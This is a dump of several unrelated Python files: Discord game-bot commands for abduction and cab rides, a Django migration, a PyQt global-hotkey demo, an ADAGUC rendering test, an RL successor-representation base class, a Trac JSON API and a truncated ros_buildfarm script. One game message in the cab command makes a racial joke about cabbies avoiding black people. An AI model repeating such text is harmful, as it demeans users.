            await fe_utils.send_message(cmd.client, target_channel, fe_utils.formatMessage(cmd.mentions[0], "You are being abducted by aliens. The ship is 20 seconds away."))
            # Restriction level 2 holds the target in place for the 20-second pull.
            ewutils.active_restrictions[target_data.id_user] = 2
            await asyncio.sleep(20)
            ewutils.active_restrictions[target_data.id_user] = 0
            ewutils.moves_active[cmd.message.author.id] = 0
            target_data.poi = 'ufoufo'
            # NOTE(review): user_data has not been modified at this point — this persist() looks redundant; confirm.
            user_data.persist()
            target_data.persist()
            await ewrolemgr.updateRoles(client=ewutils.get_client(), member=cmd.mentions[0])
            await target_data.move_inhabitants(id_poi='ufoufo')
            # NOTE(review): falling through here re-sends the "begin to abduct" message via the
            # final return below (same text twice) — confirm that is intended.
        else:
            response = "The going energy cost for abduction is pretty expensive these days. You better have a battery pack before you do something like that."
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def beam_me_up(cmd):
    """!beammeup — teleport a skinsuit-wearing player from the West Outskirts onto the UFO.

    Requires an adorned skinsuit, standing in the West Outskirts, and the ship airborne.
    On success the player is frozen for 20 seconds, then moved to 'ufoufo'.
    """
    user_data = EwUser(member=cmd.message.author)
    # Disguise check: an adorned skinsuit marks the player as "one of the aliens".
    protected = False
    cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id,
                                    item_type_filter=ewcfg.it_cosmetic)
    for cosmetic in cosmetics:
        cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
        ewutils.logMsg(str(cosmetic_data.item_props))
        if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
            if cosmetic_data.item_props.get('adorned') == 'true':
                protected = True
    poi_sought = poi_static.id_to_poi.get(user_data.poi)
    shipstate = EwGamestate(id_server=user_data.id_server, id_state='shipstate')
    if not protected:
        response = "Why would aliens abduct you? What makes you so special?"
    elif poi_sought.id_poi == 'ufoufo':
        response = 'You\'re already in here.'
    elif poi_sought.id_poi != ewcfg.poi_id_west_outskirts:
        response = "Hey, get a bit closer. The ship's in the West Outskirts. Beam up power doesn't grow on trees, you know."
    elif shipstate.bit == 1:
        response = 'The ship\'s on the ground right now, it can\'t beam shit.'
    else:
        await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, "You are being abducted by aliens. The ship is 20 seconds away."))
        # Restriction level 2 holds the player in place during the 20-second pull.
        ewutils.active_restrictions[user_data.id_user] = 2
        await asyncio.sleep(20)
        ewutils.active_restrictions[user_data.id_user] = 0
        ewutils.moves_active[cmd.message.author.id] = 0
        user_data.poi = 'ufoufo'
        user_data.persist()
        await ewrolemgr.updateRoles(client=ewutils.get_client(), member=cmd.message.author)
        # Bug fix: `response` was never assigned on this path, so falling through to the
        # final send below raised a NameError after a successful beam-up. The abduction
        # notice was already sent above, so end the command here instead.
        return await user_data.move_inhabitants(id_poi='ufoufo')
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def blockparty(cmd):
    """Admin-only: configure the block-party event.

    !blockparty slimegen  -> enable slime generation
    !blockparty close     -> end the party
    !blockparty <poi>     -> start a 6-hour party at the given POI
    """
    if not cmd.message.author.guild_permissions.administrator:
        return
    state = EwGamestate(id_server=cmd.guild.id, id_state='blockparty')
    if cmd.tokens_count <= 1:
        response = "I see you haven't gotten any smarter. Try !blockparty <setting>. Settings include 'close', 'slimegen', and any POI."
    elif cmd.tokens[1] == 'slimegen':
        state.bit = 1
        state.persist()
        response = "Slimegen turned on."
    elif cmd.tokens[1] == 'close':
        state.bit = 0
        state.value = ''
        state.persist()
        response = "OK, closing up."
    else:
        # Anything else is treated as a POI id to host the party at.
        target = poi_static.id_to_poi.get(ewutils.flattenTokenListToString(cmd.tokens[1:]))
        if target is None:
            response = "Never heard of it."
        else:
            ends_at = int(time()) + (60 * 60 * 6)  # party lasts 6 hours
            # Stored as "<poi_id><end_timestamp>" in the gamestate value.
            state.value = "{}{}".format(target.id_poi, ends_at)
            state.persist()
            response = "Block party in {}! Everybody in!".format(target.str_name)
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def hailcab(cmd):
    """Give a player at an active block party a free cab ride back to their gang base."""
    rider = EwUser(member=cmd.message.author)
    party_state = EwGamestate(id_server=cmd.guild.id, id_state='blockparty')
    # The gamestate value is "<poi_id><end_timestamp>"; strip the digits to recover the POI id.
    party_poi = ''.join(ch for ch in party_state.value if not ch.isdigit())
    if party_poi == 'outsidethe':
        # The 7-11 POI id contains digits, so the strip above mangles it; restore it.
        party_poi = ewcfg.poi_id_711
    if party_poi != rider.poi:
        response = "You can't hail a cab right now. All the cabbies are hiding for cover thanks to all the violence. Good job on that, by the way."
    elif rider.life_state in [ewcfg.life_state_enlisted, ewcfg.life_state_juvenile]:
        # Destination depends on faction; juveniles go to Juvie's Row.
        if rider.faction == ewcfg.faction_rowdys and rider.life_state == ewcfg.life_state_enlisted:
            dest = ewcfg.poi_id_rowdyroughhouse
        elif rider.faction == ewcfg.faction_killers and rider.life_state == ewcfg.life_state_enlisted:
            dest = ewcfg.poi_id_copkilltown
        else:
            dest = ewcfg.poi_id_juviesrow
        await asyncio.sleep(5)
        response = "**TAXI!** You shout into the crowd for a ride home. The drivers don't notice you're a miscreant, and pick you up without a second thought. They got nervous when you asked to return to your gang base, and forgot to ask for any fare. Nice!"
        await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
        ewutils.moves_active[cmd.message.author.id] = 0
        rider.poi = dest
        rider.persist()
        await ewrolemgr.updateRoles(client=cmd.client, member=cmd.message.author)
        return await rider.move_inhabitants(id_poi=dest, visitor=rider.id_user)
    elif rider.life_state == ewcfg.life_state_corpse:
        response = "You're already dead. The cabbies unfortunately tend to avoid black people, so you should probably just float back to the sewers."
    else:
        response = "The cabbie looks confused. Why would a person like you need a cab?"
    return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-03-28 03:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Renames three AssetIssuanceHistory date/user fields to drop the underscores:
    # issue_date -> issuedate, issued_by -> issuedby, return_date -> returndate.

    dependencies = [
        ('assetstracker', '0011_auto_20170326_2139'),
    ]

    operations = [
        migrations.RenameField(
            model_name='assetissuancehistory',
            old_name='issue_date',
            new_name='issuedate',
        ),
        migrations.RenameField(
            model_name='assetissuancehistory',
            old_name='issued_by',
            new_name='issuedby',
        ),
        migrations.RenameField(
            model_name='assetissuancehistory',
            old_name='return_date',
            new_name='returndate',
        ),
    ]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2017年12月11日
@author: Irony."[讽刺]
@site: http://alyl.vip, http://orzorz.vip, https://coding.net/u/892768447, https://github.com/892768447
@email: 892768447@qq.com
@file: HotKey
@description:
'''
import ctypes # @UnusedImport
import ctypes.wintypes
from datetime import datetime
import sys
from PyQt5.QtWidgets import QWidget, QApplication, QVBoxLayout,\
QMessageBox, QTextBrowser, QPushButton
# 参考
# https://github.com/wujunwei/python-cookbook/blob/6e550d1a2b2b045cb07e56dd0198ccf01a2f3ea1/HotKey.py
# https://github.com/chenyijie4238215/notebook/blob/ba11fcc43cf8d623d1d1a722c261ddc20ad6b941/global_hotkey/GlobalHotKey.py
__Author__ = "By: Irony.\"[讽刺]\nQQ: 892768447\nEmail: 892768447@qq.com"
__Copyright__ = "Copyright (c) 2017 Irony.\"[讽刺]"
__Version__ = "Version 1.0"
# Win32 constants for RegisterHotKey / the WM_HOTKEY window message (see winuser.h).
WM_HOTKEY = 0x0312  # posted to the window when a registered hotkey is pressed
MOD_ALT = 0x0001
MOD_NONE = 0x000
MOD_CONTROL = 0x0002
MOD_SHIFT = 0x0004
MOD_WIN = 0x0008
# Maps the human-readable modifier name used by the UI to its Win32 MOD_* flag.
Modifier = {
    "None": MOD_NONE,
    "Ctrl": MOD_CONTROL,
    "Alt": MOD_ALT,
    "Shift": MOD_SHIFT,
    "Win": MOD_WIN
}
class Window(QWidget):
    """Demo window that registers Win32 global hotkeys and logs when they fire.

    Closing the window only hides it; Alt+S (hotkey id 1) re-shows it, and the
    button quits the whole application.
    """
    # Maps registered hotkey id -> "Modifier+Key" label. Class attribute, so it
    # is shared across instances.
    KeyIds = {}

    def __init__(self, *args, **kwargs):
        super(Window, self).__init__(*args, **kwargs)
        layout = QVBoxLayout(self)
        self.logView = QTextBrowser(self)
        self.logView.append("点击右上角关闭按钮会隐藏窗口,通过热键Alt+S来显示")
        self.logView.append("等待热键中")
        layout.addWidget(QPushButton("退出整个程序", self, clicked=self.onQuit))
        layout.addWidget(self.logView)

    def unregisterHotKey(self, kid):
        """Unregister the hotkey with id `kid` from this window."""
        # NOTE(review): winId() returns a sip.voidptr; this relies on
        # ctypes.c_int(...) accepting it — confirm int(self.winId()) is not
        # required on 64-bit builds.
        ctypes.windll.user32.UnregisterHotKey(ctypes.c_int(self.winId()), kid)

    def registerHotKey(self, kid, modifier, key):
        """Register global hotkey `modifier`+`key` under id `kid`; log the result."""
        key = str(key).upper()
        _modifier = Modifier.get(modifier, None)
        if not _modifier:
            # Note: "None" maps to MOD_NONE (0), which is falsy and therefore
            # also rejected by this check.
            return QMessageBox.critical(self, "错误", "modifier key {0}未找到".format(modifier))
        success = ctypes.windll.user32.RegisterHotKey(
            ctypes.c_int(self.winId()), kid, _modifier, ord(key))
        if success:
            self.KeyIds[kid] = modifier + "+" + key
            self.logView.append("热键:{0}+{1}注册{2}".format(modifier, key, "成功"))
        else:
            self.logView.append("热键:{0}+{1}注册{2}".format(modifier, key, "失败"))

    def onQuit(self):
        # Quit the whole application: unregister every hotkey first.
        for kid in self.KeyIds:
            self.unregisterHotKey(kid)
        QApplication.instance().quit()

    def closeEvent(self, event):
        # Intercept the close request and hide the window instead of closing it.
        self.hide()
        return event.ignore()

    # The hotkeys are captured globally, so other applications never receive the
    # key event — e.g. with Ctrl+S registered, Notepad can no longer save.
    def nativeEvent(self, eventType, message):
        """Handle raw Win32 messages; react to WM_HOTKEY for our registered ids."""
        if eventType == "windows_generic_MSG" or eventType == "windows_dispatcher_MSG":
            msg = ctypes.wintypes.MSG.from_address(message.__int__())
            # (Dead code kept from the original author — noted as not runnable:)
            # if ctypes.windll.user32.GetMessageA(ctypes.byref(msg), None, 0,
            # 0) != 0:
            if msg.message == WM_HOTKEY:
                if msg.wParam == 1:  # hotkey id 1 is Alt+S: re-show the hidden window
                    self.show()
                self.logView.append("id:{0}, {1} at time:{2}".format(
                    msg.wParam, self.KeyIds.get(msg.wParam, None), datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
                return True, 0
        return super(Window, self).nativeEvent(eventType, message)
if __name__ == "__main__":
    app = QApplication(sys.argv)
    window = Window()
    window.show()
    # Register Alt/Ctrl/Shift/Win + S, plus Win + Z, as global hotkeys (ids 1-5).
    hotkeys = [("Alt", "S"), ("Ctrl", "S"), ("Shift", "S"), ("Win", "S"), ("Win", "Z")]
    for kid, (modifier, key) in enumerate(hotkeys, start=1):
        window.registerHotKey(kid, modifier, key)
    sys.exit(app.exec_())
|
import os
from io import BytesIO
from adaguc.CGIRunner import CGIRunner
import unittest
import shutil
import sys
import subprocess
from lxml import etree
from lxml import objectify
import re
from adaguc.AdagucTestTools import AdagucTestTools
ADAGUC_PATH = os.environ["ADAGUC_PATH"]
class TestWMSPolylineLabel(unittest.TestCase):
    """Regression tests: render WMS polyline-label styles and compare pixel-exact
    against stored reference PNGs."""
    testresultspath = "testresults/TestWMSPolylineLabel/"
    expectedoutputsspath = "expectedoutputs/TestWMSPolylineLabel/"
    env = {"ADAGUC_CONFIG": ADAGUC_PATH + "/data/config/adaguc.tests.dataset.xml"}
    # Runs at class-definition time: make sure the results directory exists.
    AdagucTestTools().mkdir_p(testresultspath)

    def dotest(self, stylename):
        """Render the 'areas' layer with *stylename* and require a byte-identical PNG."""
        AdagucTestTools().cleanTempDir()
        config = (
            ADAGUC_PATH
            + "/data/config/adaguc.tests.dataset.xml,"
            + ADAGUC_PATH
            + "/data/config/datasets/adaguc.testwmspolylinelabels.xml"
        )
        # First pass: update the database from the dataset config.
        status, data, headers = AdagucTestTools().runADAGUCServer(
            args=["--updatedb", "--config", config], env=self.env, isCGI=False
        )
        self.assertEqual(status, 0)
        sys.stdout.write("\ntest style %s " % stylename)
        sys.stdout.flush()
        filename = "test_WMSPolylineLabel_" + stylename + ".png"
        # NOTE(review): the GetMap URL repeats SERVICE=WMS ("&&SERVICE=WMS") —
        # harmless to the server but probably unintended.
        status, data, headers = AdagucTestTools().runADAGUCServer(
            "DATASET=adaguc.testwmspolylinelabels&SERVICE=WMS&&SERVICE=WMS&VERSION=1.3.0&REQUEST=GetMap&LAYERS=areas&WIDTH=256&HEIGHT=256&CRS=EPSG%3A4326&BBOX=49,1.5,55,7.5&STYLES="
            + stylename
            + "%2Fpolyline&FORMAT=image/png&TRANSPARENT=TRUE&",
            env=self.env,
        )
        # Save the rendered image for inspection, then compare to the reference.
        AdagucTestTools().writetofile(self.testresultspath + filename, data.getvalue())
        self.assertEqual(status, 0)
        self.assertEqual(
            data.getvalue(),
            AdagucTestTools().readfromfile(self.expectedoutputsspath + filename),
        )

    def test_WMSPolyLineLabel_borderwidth_0_5px(self):
        self.dotest("polyline_black_0.5px")

    def test_WMSPolyLineLabel(self):
        self.dotest("polyline_with_label")

    def test_WMSPolyLineLabelOverlap2(self):
        self.dotest("polyline_with_label_overlap")

    def test_WMSPolyLineLabelAngle(self):
        self.dotest("polyline_with_label_angle")

    def test_WMSPolyLineLabelRoboto(self):
        self.dotest("polyline_with_label_roboto")

    def test_WMSPolyLineLabelColor(self):
        self.dotest("polyline_with_label_color")

    # GD font handling is apparently very libgd version dependent.
    # GD tests switched off for the moment.
    #
    # def test_WMSPolyLineLabelRoboto_gd(self):
    #     self.dotest("polyline_with_label_roboto_gd")
    # def test_WMSPolyLineLabel_gd(self):
    #     self.dotest("polyline_with_label_gd")
|
from abc import ABC, abstractmethod
import torch
import random
import math
# from torch_ac.format import default_preprocess_obss
# from torch_ac.utils import DictList, ParallelEnv
from ReplayMemory import ReplayMemory
from utils import default_preprocess_obss, DictList, ParallelEnv
import numpy as np
class BaseSRAlgo(ABC):
    """The base class for successor-representation RL algorithms."""

    def __init__(self, envs, model, target, device, num_frames_per_proc, discount, lr, gae_lambda,
                 max_grad_norm, recurrence, memory_cap, preprocess_obss, reshape_reward=None):
        """
        Initializes a `BaseSRAlgo` instance.

        Parameters:
        ----------
        envs : list
            a list of environments that will be run in parallel
        model : torch.Module
            the model being trained
        target : torch.Module
            a second copy of the model used to compute bootstrap targets
        device : torch.device
            device on which rollout tensors are allocated
        num_frames_per_proc : int
            the number of frames collected by every process for an update
        discount : float
            the discount for future rewards
        lr : float
            the learning rate for optimizers
        gae_lambda : float
            the lambda coefficient in the GAE formula
            ([Schulman et al., 2015](https://arxiv.org/abs/1506.02438))
        max_grad_norm : float
            gradient will be clipped to be at most this value
        recurrence : int
            the number of steps the gradient is propagated back in time
        memory_cap : int
            capacity of the replay memory
        preprocess_obss : function
            a function that takes observations returned by the environment
            and converts them into the format that the model can handle
        reshape_reward : function
            a function that shapes the reward, takes an
            (observation, action, reward, done) tuple as an input
        """
        # Store parameters
        self.env = ParallelEnv(envs)
        self.model = model
        self.target = target
        self.device = device
        self.num_frames_per_proc = num_frames_per_proc
        self.discount = discount
        self.lr = lr
        self.gae_lambda = gae_lambda
        self.max_grad_norm = max_grad_norm
        self.recurrence = recurrence
        self.replay_memory = ReplayMemory(memory_cap)
        use_cuda = torch.cuda.is_available()
        self.FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
        self.total_updates = 0
        self.preprocess_obss = preprocess_obss or default_preprocess_obss
        self.reshape_reward = reshape_reward
        self.continuous_action = model.continuous_action

        # Control parameters
        assert self.model.recurrent or self.recurrence == 1
        assert self.num_frames_per_proc % self.recurrence == 0

        # Configure acmodel
        self.model.to(self.device)
        self.model.train()
        self.target.to(self.device)
        self.target.train()

        # Store helpers values
        self.num_procs = len(envs)
        self.num_frames = self.num_frames_per_proc * self.num_procs

        # Initialize experience values.
        # shape is (T, P); vec_shape is (T, P, D) with D the embedding size.
        shape = (self.num_frames_per_proc, self.num_procs)
        vec_shape = (self.num_frames_per_proc, self.num_procs, self.model.embedding_size)
        self.obs = self.env.reset()
        self.obss = [None]*(shape[0])
        if self.model.recurrent:
            self.memory = torch.zeros(shape[1], self.model.memory_size, device=self.device)
            self.memories = torch.zeros(*shape, self.model.memory_size, device=self.device)
        self.mask = torch.ones(shape[1], device=self.device)
        self.masks = torch.zeros(*shape, device=self.device)
        if self.continuous_action:
            self.actions = torch.zeros(self.num_frames_per_proc, self.num_procs, self.model.n_actions, device=self.device)
        else:
            self.actions = torch.zeros(*shape, device=self.device, dtype=torch.int)
        self.values = torch.zeros(*shape, device=self.device)
        self.rewards = torch.zeros(*shape, device=self.device)
        self.SR_advantages = torch.zeros(*vec_shape, device=self.device)
        self.V_advantages = torch.zeros(*shape, device=self.device)
        self.log_probs = torch.zeros(*shape, device=self.device)
        self.embeddings = torch.zeros(*vec_shape, device=self.device)
        self.successors = torch.zeros(*vec_shape, device=self.device)
        # Parallel buffers holding the target network's outputs for bootstrapping.
        self.target_values = torch.zeros(*shape, device=self.device)
        self.target_embeddings = torch.zeros(*vec_shape, device=self.device)
        self.target_successors = torch.zeros(*vec_shape, device=self.device)

        # Initialize log values
        self.log_episode_return = torch.zeros(self.num_procs, device=self.device)
        self.log_episode_reshaped_return = torch.zeros(self.num_procs, device=self.device)
        self.log_episode_num_frames = torch.zeros(self.num_procs, device=self.device)
        self.log_done_counter = 0
        self.log_return = [0] * self.num_procs
        self.log_reshaped_return = [0] * self.num_procs
        self.log_num_frames = [0] * self.num_procs

    def collect_experiences(self):
        """Collects rollouts and computes advantages.

        Runs several environments concurrently. The next actions are computed
        in a batch mode for all environments at the same time. The rollouts
        and advantages from all environments are concatenated together.

        Returns
        -------
        exps : DictList
            Contains actions, rewards, advantages etc as attributes.
            Each attribute, e.g. `exps.reward` has a shape
            (self.num_frames_per_proc * num_envs, ...). k-th block
            of consecutive `self.num_frames_per_proc` frames contains
            data obtained from the k-th environment. Be careful not to mix
            data from different environments!
        logs : dict
            Useful stats about the training process, including the average
            reward, policy loss, value loss, etc.
        """
        for i in range(self.num_frames_per_proc):
            # Do one agent-environment interaction
            if self.continuous_action:
                self.obs = [o for o in self.model.scaler.transform(self.obs)]
            preprocessed_obs = self.preprocess_obss(self.obs, device=self.device)
            with torch.no_grad():
                if self.model.use_memory:
                    dist, value, embedding, _, successor, _, memory = self.model(preprocessed_obs, memory=self.memory * self.mask.unsqueeze(1))
                    _, target_value, target_embedding, _, target_successor, _, _ = self.target(preprocessed_obs, memory=self.memory * self.mask.unsqueeze(1))
                else:
                    dist, value, embedding, _, successor, _, _ = self.model(preprocessed_obs)
                    _, target_value, target_embedding, _, target_successor, _, _ = self.target(preprocessed_obs)
            if self.continuous_action:
                action = dist.sample().detach()
                # Clamp to the env's action bounds and sanitize NaN/inf samples.
                # NOTE(review): torch.nan_to_num is not in-place and its result is
                # discarded here — confirm `action = torch.nan_to_num(...)` was intended.
                action = torch.clamp(action, self.env.envs[0].min_action, self.env.envs[0].max_action)
                torch.nan_to_num(action, nan=0.0, posinf=self.env.envs[0].max_action, neginf=self.env.envs[0].min_action)
            else:
                action = dist.sample().detach()
            obs, reward, terminated, truncated, _ = self.env.step(action.cpu().numpy())
            # Gymnasium-style step: an episode ends on either termination or truncation.
            done = tuple(a | b for a, b in zip(terminated, truncated))
            # Assumes preprocessed observations expose .image and .text fields.
            self.replay_memory.push((preprocessed_obs.image, preprocessed_obs.text,
                                     self.FloatTensor([reward])))

            # Update experiences values
            self.obss[i] = self.obs
            self.obs = obs
            if self.model.use_memory:
                self.memories[i] = self.memory
                self.memory = memory
            self.masks[i] = self.mask
            # mask is 0 where the episode just ended, 1 otherwise.
            self.mask = 1 - torch.tensor(done, device=self.device, dtype=torch.float)
            self.actions[i] = action
            self.values[i] = value
            self.embeddings[i] = embedding
            self.successors[i] = successor
            self.target_values[i] = target_value
            self.target_embeddings[i] = target_embedding
            self.target_successors[i] = target_successor
            if self.reshape_reward is not None:
                self.rewards[i] = torch.tensor([
                    self.reshape_reward(obs_, action_, reward_, done_)
                    for obs_, action_, reward_, done_ in zip(obs, action, reward, done)
                ], device=self.device)
            else:
                self.rewards[i] = torch.tensor(reward, device=self.device)
            self.log_probs[i] = dist.log_prob(action).squeeze()
            ##TODO:
            #for continuous actions need to collect mean and var as well so that they can be used in ppo ratio

            # Update log values
            self.log_episode_return += torch.tensor(reward, device=self.device, dtype=torch.float)
            self.log_episode_reshaped_return += self.rewards[i]
            self.log_episode_num_frames += torch.ones(self.num_procs, device=self.device)
            # NOTE(review): this inner loop reuses `i`, shadowing the frame index;
            # it works only because `i` is not read again before the next outer
            # iteration reassigns it — consider renaming.
            for i, done_ in enumerate(done):
                if done_:
                    self.log_done_counter += 1
                    self.log_return.append(self.log_episode_return[i].item())
                    self.log_reshaped_return.append(self.log_episode_reshaped_return[i].item())
                    self.log_num_frames.append(self.log_episode_num_frames[i].item())
            # Zero the per-episode accumulators for envs that just finished.
            self.log_episode_return *= self.mask
            self.log_episode_reshaped_return *= self.mask
            self.log_episode_num_frames *= self.mask

        # Add advantage and return to experiences
        if self.continuous_action:
            # Assuming flat observations for the continuous-action case:
            # this is true for the Mountain Cart example but may not be in general.
            # Ideally the continuous action code should be modified to handle flat or image input,
            # the use of a scaler should be an option to train.py, and either checks here
            # or a wrapper that does the scaling should be set up in train.py.
            self.obs = [o for o in self.model.scaler.transform(self.obs)]
        preprocessed_obs = self.preprocess_obss(self.obs, device=self.device)
        with torch.no_grad():
            if self.model.use_memory:
                _, next_value, _, _, next_successor, _, _ = self.target(preprocessed_obs, memory=self.memory * self.mask.unsqueeze(1)) #target
            else:
                _, next_value, _, _, next_successor, _, _ = self.target(preprocessed_obs)

        # GAE-style backward pass over the rollout, computing advantages for the
        # successor representation (value-advantage code kept commented out).
        for i in reversed(range(self.num_frames_per_proc)):
            next_mask = self.masks[i+1] if i < self.num_frames_per_proc - 1 else self.mask
            next_successor = self.target_successors[i+1] if i < self.num_frames_per_proc - 1 else next_successor
            #next_value = self.target_values[i+1] if i < self.num_frames_per_proc - 1 else next_value
            next_SR_advantage = self.SR_advantages[i+1] if i < self.num_frames_per_proc - 1 else 0
            # next_V_advantage = self.V_advantages[i+1] if i < self.num_frames_per_proc - 1 else 0
            # TD error of the successor features; the mask zeroes the bootstrap at episode ends.
            SR_delta = self.target_embeddings[i] + (self.discount * next_successor * next_mask.reshape(-1,1)) - self.target_successors[i]
            self.SR_advantages[i] = SR_delta + (self.discount * self.gae_lambda * next_SR_advantage * next_mask.reshape(-1,1))
            # V_delta = self.rewards[i] + self.discount * next_value * next_mask - self.target_values[i]
            # self.V_advantages[i] = V_delta + self.discount * self.gae_lambda * next_V_advantage * next_mask

        # Define experiences:
        #   the whole experience is the concatenation of the experience
        #   of each process.
        # In comments below:
        #   - T is self.num_frames_per_proc,
        #   - P is self.num_procs,
        #   - D is the dimensionality.
        exps = DictList()
        exps.obs = [self.obss[i][j]
                    for j in range(self.num_procs)
                    for i in range(self.num_frames_per_proc)]
        if self.model.use_memory:
            # T x P x D -> P x T x D -> (P * T) x D
            exps.memory = self.memories.transpose(0, 1).reshape(-1, *self.memories.shape[2:])
        # T x P -> P x T -> (P * T) x 1
        exps.mask = self.masks.transpose(0, 1).reshape(-1).unsqueeze(1)
        # for all tensors below, T x P -> P x T -> P * T
        exps.action = self.actions.transpose(0, 1).reshape(-1)
        exps.value = self.values.transpose(0, 1).reshape(-1)
        exps.reward = self.rewards.transpose(0, 1).reshape(-1)
        exps.SR_advantage = self.SR_advantages.transpose(0, 1).reshape(-1,self.model.embedding_size)
        exps.successor = self.successors.transpose(0, 1).reshape(-1,self.model.embedding_size)
        # Successor-feature "return" target: current estimate plus advantage.
        exps.successorn = exps.successor + exps.SR_advantage
        #exps.V_advantage = self.V_advantages.transpose(0, 1).reshape(-1)
        #exps.returnn = exps.value + exps.V_advantage
        exps.log_prob = self.log_probs.transpose(0, 1).reshape(-1)

        # Preprocess experiences
        exps.obs = self.preprocess_obss(exps.obs, device=self.device)

        # Log some values
        keep = max(self.log_done_counter, self.num_procs)
        logs = {
            "return_per_episode": self.log_return[-keep:],
            "reshaped_return_per_episode": self.log_reshaped_return[-keep:],
            "num_frames_per_episode": self.log_num_frames[-keep:],
            "num_frames": self.num_frames
        }
        self.log_done_counter = 0
        self.log_return = self.log_return[-self.num_procs:]
        self.log_reshaped_return = self.log_reshaped_return[-self.num_procs:]
        self.log_num_frames = self.log_num_frames[-self.num_procs:]
        return exps, logs

    @abstractmethod
    def update_parameters(self):
        # Subclasses implement the optimization step over collected experiences.
        pass
|
# -*- coding: utf-8 -*-
#
# Web API module of Dashboard.
#
# (C) 2013 Internet Initiative Japan Inc.
# All rights reserved.
#
# Created on 2013/05/28
# @author: yosinobu@iij.ad.jp
try:
import json
except ImportError:
import simplejson as json
from trac.core import Component, implements, ExtensionPoint
from trac.web import IRequestHandler
from tracportal.api import IProjectListProvider
from tracportal.project_list.api import IProjectInfoProvider
__author__ = 'yosinobu@iij.ad.jp'
class DashboardAPIModule(Component):
    """JSON endpoint under /dashboard/api/projects listing the projects the
    authenticated user may see, with extra permission checks per sub-path."""
    implements(IRequestHandler)

    project_list_providers = ExtensionPoint(IProjectListProvider)
    project_info_providers = ExtensionPoint(IProjectInfoProvider)

    # IRequestHandler methods
    def match_request(self, req):
        """Claim every request whose path starts with /dashboard/api/projects."""
        return req.path_info and req.path_info.startswith('/dashboard/api/projects')

    def process_request(self, req):
        """Send a JSON array of {id, name, description, url} project records."""
        req.perm.require('PORTAL_DASHBOARD_VIEW')
        # XML_RPC is always required; each sub-view adds its own permissions.
        required = ['XML_RPC']
        if req.path_info.endswith('/report'):
            required += ['TICKET_VIEW', 'REPORT_VIEW']
        elif req.path_info.endswith('/roadmap'):
            required += ['TICKET_VIEW', 'ROADMAP_VIEW', 'MILESTONE_VIEW']
        elif req.path_info.endswith('/timeline'):
            required += ['TIMELINE_VIEW']
        projects = []
        for list_provider in self.project_list_providers:
            names = list_provider.get_env_name_list(required, [req.authname])
            if not names:
                continue
            for env_name in names:
                # First info provider that knows this environment wins.
                for info_provider in self.project_info_providers:
                    info = info_provider.get_info(env_name)
                    if info:
                        projects.append({
                            'id': info.id,
                            'name': info.name,
                            'description': info.description,
                            'url': info.url
                        })
                        break
        req.send(json.dumps(projects), 'application/json')
|
# Copyright 2017 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from ros_buildfarm.argument import add_argument_config_url
from ros_buildfarm.argument import add_argument_dry_run
from ros_buildfarm.common import get_release_job_prefix
from ros_buildfarm.common import JobValidationError
from ros_buildfarm.config import get_index
from ros_buildfarm.config import get_release_build_files
from ros_buildfarm.jenkins import configure_job
from ros_buildfarm.jenkins import connect
from ros_buildfarm.templates import expand_template
def main(argv=sys.argv[1:]):
    """Generate the 'upload_main' and 'upload_testing' Jenkins jobs."""
    parser = argparse.ArgumentParser(
        description="Generate the 'upload_main' and 'upload_testing' jobs.")
    add_argument_config_url(parser)
    add_argument_dry_run(parser)
    args = parser.parse_args(argv)

    template_name = 'release/trigger_upload_repo_job.xml.em'
    config = get_index(args.config_url)
    jenkins = connect(config.jenkins_url)
    for repo in ('main', 'testing'):
        # Only the 'main' upload job blocks while its upstream jobs are building.
        blocked = 'true' if repo == 'main' else 'false'
        job_config = expand_template(template_name, {
            'block_when_upstream_building': blocked,
            'sync_targets': sorted(get_sync_targets(config, repo)),
            'upstream_job_names': get_upstream_job_names(config, repo),
            'recipients': config.notify_emails})
        configure_job(jenkins, 'upload_%s' % repo, job_config, dry_run=args.dry_run)
def get_sync_targets(config, repo):
    """Return the set of sync target names for *repo* across all distributions.

    Debian/Ubuntu targets collapse to the bare repo name; any other OS is
    prefixed, e.g. 'rhel-main'.
    """
    targets = set()
    for rosdistro in config.distributions.keys():
        for build_file in get_release_build_files(config, rosdistro).values():
            for os_name in build_file.targets.keys():
                target = repo if os_name in ('debian', 'ubuntu') else os_name + '-' + repo
                targets.add(target)
    return targets
def get_upstream_job_names(config, repo):
    """Return a comma-separated, sorted list of upstream job names for *repo*.

    'main' depends on one sync job per distribution; 'testing' depends on one
    sync job per (distribution, code name, architecture). Both also depend on
    'import_upstream'. Raises JobValidationError for any other repo name.
    """
    distributions = config.distributions.keys()
    if repo == 'main':
        upstream_job_names = ['{0}_sync-packages-to-{1}'.format(
            get_release_job_prefix(rosdistro), repo) for rosdistro in distributions]
    elif repo == 'testing':
        upstream_job_names = []
        for rosdistro in distributions:
            # Collect the union of architectures per code name across build files.
            architectures_by_code_name = {}
            build_files = get_release_build_files(config, rosdistro)
            for build_file in build_files.values():
                for os_name in build_file.targets.keys():
                    for code_name, architectures in build_file.targets[os_name].items():
                        architectures_by_code_name[code_name] = \
                            architectures_by_code_name.get(code_name, set()) | \
                            set(architectures.keys())
            for code_name, archs in architectures_by_code_name.items():
                for arch in archs:
